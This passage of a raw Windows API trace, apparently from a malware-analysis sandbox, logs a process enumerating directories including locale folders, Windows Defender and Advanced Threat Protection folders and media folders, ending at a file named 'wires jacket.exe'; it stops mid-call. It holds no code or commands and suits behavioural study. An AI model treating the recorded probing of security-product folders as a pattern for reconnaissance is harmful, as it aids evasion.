ftLastWriteTime.dwLowDateTime=0x8f420b1b, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0172.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.384] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f420b1b, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa8706406, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8f420b1b, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nn-NO", cAlternateFileName="")) returned 1 [0172.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.387] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f420b1b, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa870879d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8f741ca5, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0172.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.389] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f9f0764, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa8758deb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8fb21a2e, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0172.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.390] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8fb940f6, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa879d17a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x910709ea, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0172.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.392] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x910709ea, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa8805329, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x91ab8c63, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="resources", cAlternateFileName="RESOUR~1")) returned 1 [0172.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.395] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91ab8c63, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa8807941, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x91b2b4b0, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0172.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.399] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91b515fd, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa8880860, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x91ca8b67, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0172.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.402] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91ca8b67, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa88ef27e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x92500ff3, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0172.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.405] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x926583f5, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa88f19a1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x92906e91, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0172.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.411] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92906e91, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa8945b83, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x92eb078f, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~1")) returned 1 [0172.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.414] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92eb078f, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa8a33d41, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x934cc975, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0172.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.497] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x934cc975, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa8a36304, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x93670243, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="th-TH", cAlternateFileName="")) returned 1 [0172.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.503] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93670243, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa8b3c077, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x93991459, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0172.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.506] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93991459, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa8c00614, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x93a9c3f1, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0172.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.511] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93b5b0aa, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa8c62177, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x949a9132, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vi-VN", cAlternateFileName="")) returned 1 [0172.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.514] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x949a9132, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa8c9dee8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x94c57ba9, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0172.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.518] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x94c57ba9, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa8db6dd8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x94cf0533, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0172.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.522] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x94cf0533, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa8db965a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x94cf0533, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0172.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.525] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x94cf0533, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa8db965a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x94cf0533, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0172.525] FindClose (in: hFindFile=0x727f48 | out: hFindFile=0x727f48) returned 1 [0172.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0172.526] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89d8d47d, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x89d8d47d, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x89d8d47d, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x455c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Detector_131491847713900000.xml", cAlternateFileName="DETECT~1.XML")) returned 1 [0172.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0172.526] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x865d24d3, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa755519f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x94cf0533, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91be532c-f9f1-406a-9858-43697c6f437a}", cAlternateFileName="{91BE5~1")) returned 0 [0172.526] FindClose (in: hFindFile=0x728108 | out: hFindFile=0x728108) returned 1 [0172.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457bee8 | out: hHeap=0x6a0000) returned 1 [0172.528] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x865d24d3, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa74805fd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x865d24d3, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Campaigns", cAlternateFileName="CAMPAI~1")) returned 0 [0172.528] FindClose (in: hFindFile=0x727d88 | out: hFindFile=0x727d88) returned 1 [0172.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0172.528] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c52ff94, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xe801ba9a, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xe801ba9a, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0172.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0172.532] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x106b6e00, ftCreationTime.dwHighDateTime=0x1d2c1d0, ftLastAccessTime.dwLowDateTime=0x4c5561e0, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x106b6e00, ftLastWriteTime.dwHighDateTime=0x1d2c1d0, nFileSizeHigh=0x0, nFileSizeLow=0xc86, dwReserved0=0x0, dwReserved1=0x0, cFileName="Task.xml", cAlternateFileName="")) returned 1 [0172.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0172.532] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa8f11cc1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x711dc3b4, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Windows Defender", cAlternateFileName="WINDOW~1")) returned 1 [0172.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0172.535] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26a5b2a5, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x26a5b2a5, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x26a5b2a5, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xb2fa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EppManifest.dll", cAlternateFileName="")) returned 1 [0172.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0172.537] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26aa7774, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x26aa7774, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x26aa7774, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x851a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProtectionManagement.dll", cAlternateFileName="")) returned 1 [0172.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0172.621] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6d9d2c8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa8fde0ed, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8231541, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Windows Defender Advanced Threat Protection", cAlternateFileName="WIF4A9~1")) returned 1 [0172.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0172.965] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7822b459, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe304e38c, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe304e38c, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x3bb568, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsSense.exe", cAlternateFileName="")) returned 1 [0172.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0172.965] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe5357cd7, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xe5357cd7, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Windows Mail", cAlternateFileName="WINDOW~2")) returned 1 [0172.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0172.965] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d342cc, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d342cc, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d5a533, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1f0a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="msoe.dll", cAlternateFileName="")) returned 1 [0172.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0172.966] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa6e4faee, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xe5331a22, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xe5331a22, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0172.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0172.967] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa6e75d43, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa9125145, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa6e75d43, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Icons", cAlternateFileName="")) returned 1 [0172.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0172.967] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa6e75d43, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa9182d5a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa6e75d43, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Media Renderer", cAlternateFileName="MEDIAR~1")) returned 1 [0172.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0172.969] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa40fd93f, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa5b5da3e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xc4f45c00, ftLastWriteTime.dwHighDateTime=0x1d29fa3, nFileSizeHigh=0x0, nFileSizeLow=0x2c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="mpvis.DLL", cAlternateFileName="")) returned 1 [0172.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0172.971] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa40d76dc, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa5b5da3e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x88286500, ftLastWriteTime.dwHighDateTime=0x1d29fa3, nFileSizeHigh=0x0, nFileSizeLow=0x1c0200, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup_wm.exe", cAlternateFileName="")) returned 1 [0172.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0172.972] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa6e9bf9c, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa91c754d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa6e9bf9c, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Visualizations", cAlternateFileName="VISUAL~1")) returned 1 [0172.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0172.972] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67581620, ftCreationTime.dwHighDateTime=0x1d4f7be, ftLastAccessTime.dwLowDateTime=0xb342adc0, ftLastAccessTime.dwHighDateTime=0x1d4f156, ftLastWriteTime.dwLowDateTime=0xb342adc0, ftLastWriteTime.dwHighDateTime=0x1d4f156, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="wires jacket.exe", cAlternateFileName="WIRESJ~1.EXE")) returned 1 [0172.973] HeapFree (in: 